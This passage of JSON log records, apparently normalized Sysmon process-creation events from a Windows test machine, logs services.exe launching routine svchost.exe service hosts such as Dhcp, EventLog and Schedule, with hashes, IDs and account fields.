22:19:17.161\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00104fee0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1360\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00104fee0000", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1360", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.161Z", "type": "raw", "uuid": "6b410eb5-7dab-418b-bc4c-5c283a8dad56"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.6005726Z\"},\"EventRecordID\":\"27479\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.115\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00109fe80000}\"},{\"Name\":\"ProcessId\",\"text\":\"1308\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s nsi\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s nsi", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00109fe80000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1308", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.115Z", "type": "raw", "uuid": "16da7870-19ee-4486-8f63-33789e00bba6"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4871541Z\"},\"EventRecordID\":\"27475\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.064\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010dcdf0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1240\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s UserManager\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010dcdf0000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1240", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.064Z", "type": "raw", "uuid": "39de87fa-4045-4609-8be5-e8544a4229c5"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4853450Z\"},\"EventRecordID\":\"27474\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.053\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001089dd0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1212\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001089dd0000", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1212", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.053Z", "type": "raw", "uuid": "b3956e3e-4c88-40c5-9a70-7f8765c475a2"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4827372Z\"},\"EventRecordID\":\"27470\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.008\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001032d70000}\"},{\"Name\":\"ProcessId\",\"text\":\"1156\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s ProfSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001032d70000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1156", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.008Z", "type": "raw", "uuid": "cf209215-f462-4906-ab00-ba5412e1f54e"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4321198Z\"},\"EventRecordID\":\"27469\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.929\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010a5d20000}\"},{\"Name\":\"ProcessId\",\"text\":\"1104\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010a5d20000", "object.process.hash.imphash": 
